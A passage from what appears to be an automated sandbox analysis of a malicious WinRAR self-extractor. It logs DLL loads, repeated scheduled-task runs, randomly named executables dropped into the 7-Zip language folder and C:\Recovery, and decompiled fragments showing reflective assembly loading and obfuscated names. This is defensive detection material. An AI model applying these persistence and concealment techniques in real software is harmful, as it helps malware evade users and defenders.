            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: version.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: wldp.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: profapi.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: amsi.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: userenv.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: propsys.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: edputil.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: netutils.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: slc.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: sppc.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: mscoree.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: apphelp.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: kernel.appcore.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: version.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: uxtheme.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: windows.storage.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: wldp.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: profapi.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: cryptsp.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: rsaenh.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: cryptbase.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: sspicli.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: amsi.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: userenv.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: rasapi32.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: rasman.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: rtutils.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: mswsock.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: winhttp.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: iphlpapi.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: dhcpcsvc.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: dnsapi.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: winnsi.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: rasadhlp.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: fwpuclnt.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: wbemcomn.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: winmm.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: winmmbase.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: mmdevapi.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: devobj.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: ksuser.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: avrt.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: audioses.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: powrprof.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: umpdc.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: msacm32.dll
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeSection loaded: midimap.dll
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeDirectory created: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeDirectory created: C:\Program Files\7-Zip\Lang\c4950d50751633Jump to behavior
            Source: N0tepkRPzw.exeStatic file information: File size 1806983 > 1048576
            Source: N0tepkRPzw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: N0tepkRPzw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: N0tepkRPzw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: N0tepkRPzw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: N0tepkRPzw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: N0tepkRPzw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: N0tepkRPzw.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: N0tepkRPzw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: N0tepkRPzw.exe
            Source: N0tepkRPzw.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: N0tepkRPzw.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: N0tepkRPzw.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: N0tepkRPzw.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: N0tepkRPzw.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, BPlkEZbgpdgWkPvxeOi.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.N0tepkRPzw.exe.60f9f3a.0.raw.unpack, BPlkEZbgpdgWkPvxeOi.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, VnjqRUpONPwOHnBxdFS.cs.Net Code: h91IjUkwSs System.AppDomain.Load(byte[])
            Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, VnjqRUpONPwOHnBxdFS.cs.Net Code: h91IjUkwSs System.Reflection.Assembly.Load(byte[])
            Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, VnjqRUpONPwOHnBxdFS.cs.Net Code: h91IjUkwSs
            Source: 0.3.N0tepkRPzw.exe.60f9f3a.0.raw.unpack, VnjqRUpONPwOHnBxdFS.cs.Net Code: h91IjUkwSs System.AppDomain.Load(byte[])
            Source: 0.3.N0tepkRPzw.exe.60f9f3a.0.raw.unpack, VnjqRUpONPwOHnBxdFS.cs.Net Code: h91IjUkwSs System.Reflection.Assembly.Load(byte[])
            Source: 0.3.N0tepkRPzw.exe.60f9f3a.0.raw.unpack, VnjqRUpONPwOHnBxdFS.cs.Net Code: h91IjUkwSs
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeFile created: C:\bridgeportserver\__tmp_rar_sfx_access_check_4367921Jump to behavior
            Source: N0tepkRPzw.exeStatic PE information: section name: .didat
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D6E28C push eax; ret 0_2_00D6E2AA
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D6ED46 push ecx; ret 0_2_00D6ED59
            Source: C:\bridgeportserver\blockServerruntime.exeCode function: 4_2_00007FFD9BAA90E6 push esp; ret 4_2_00007FFD9BAA90E7
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeCode function: 28_2_00007FFD9BACE55C push es; retn 7002h28_2_00007FFD9BACE639
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeCode function: 28_2_00007FFD9BAC33B1 pushfd ; iretd 28_2_00007FFD9BAC33B2
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeCode function: 28_2_00007FFD9BAC362D push E95E508Fh; ret 28_2_00007FFD9BAC3649
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeCode function: 28_2_00007FFD9BAD28F8 push eax; retf 28_2_00007FFD9BAD28F9
            Source: blockServerruntime.exe.0.drStatic PE information: section name: .text entropy: 6.987474284573492
            Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe.4.drStatic PE information: section name: .text entropy: 6.987474284573492
            Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe0.4.drStatic PE information: section name: .text entropy: 6.987474284573492
            Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, Eerer8UhOJagg1I7ZRa.csHigh entropy of concatenated method names: 'TNVrufKgUA', 'PZKrNvTA3i', 'mpyr1RepBC', 'bc4rEZMjwE', 'Rrsr4fdc2b', 'zIUr8y1tj3', 'ijsMGpWGulqIkeh2iUh', 'VwQp1PWubr7ZVWhRAIR', 'xAXZDNW2e86IPBSNPRi', 'gaASDIWpNUaJwvO1oCn'
            Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, jFJRA1UwfdLv83E9OYu.csHigh entropy of concatenated method names: 'AGda3h7Afs', 'vtjaZ6dXwi', 'QQ5atJtGjY', 'cOVUCyEPGFoNuOdvZQl', 'TOuDqqEnpoG8ktootKe', 'SPD2J1E7R0fFpUVW0pP', 'VjKv2WEQunvQKighiYt', 'wEdaVohs0b', 'B5Nara8Z1O', 'B0UaCqCcut'
            Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, sqDVV7peMwBpBpMg6rB.csHigh entropy of concatenated method names: 'vV5n5NbLCQ', 'VBwnjQ4ZwJ', 'arrWEjDfFTH6KEnLrib', 'cNhcRZDUZqmqomLsPKL', 'GVgwIqDYSPLr7ej56ra', 'PkOWgQDCpqfPI95Q7Ig', 'hhjLj7DgTYpd254ITYY', 'fspnWDDu8d7QdsexdvW', 'nCOEjVD2GfbH7j6Ft5h', 'Lc7u9uDGXDpeGTb1Zqb'
            Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, DSUQ2IU60LRojn671kk.csHigh entropy of concatenated method names: '_269', '_5E7', 'OcQvjAjrUR', 'Mz8', 'ETIvZttkgA', 'fqgtMFCcY5xZk1j0LgC', 'xSPjRKC9qiLDQU9AP5n', 'MeWkFWCkbgC1VGcU4cv', 'UXAYAWCxb12hcGQt5Ma', 'nQhieICilRYBGTUUsMq'
            Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, elIuMU5UKnEJJHCU0pc.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'xHJgOFLpt4PMYl8tlGd', 'fv8GZJLhcyLK61S9Vfj', 'sq1d9KL366LvuErfrby', 'RZhF1mLNPHLVeV3DCb3', 'LBDSlLLTdhpFj6yhowt', 'I9P7AELZQmYZkrURuoG'
            Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, VnjqRUpONPwOHnBxdFS.csHigh entropy of concatenated method names: 'te6IvB9sni', 'nbFIbcTeyo', 'QhSIAOpMO0', 'BuKIegLN2V', 'Rh3IBWbs9X', 'hexI75mulI', 'jw3IMkgvKc', 'SLqqVNofYg9TtJNB3DV', 'bFTRvmoYcgYjJLt4uuu', 'gG2nA6oCsm77dts2vir'
            Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, RSAEDiWjrxQxO53y3W.csHigh entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'CbSYDn5D25P3yEyc7Q6', 'tR2OsK5VASITj4ZG449', 'XALFJt56DkUwGJWIbrD', 'iYtUvZ5avyYqlKZEO8O', 'K6n4Qt5SnCvL3mh76SH', 'UEjodp5W3I6e5ltY3jb'
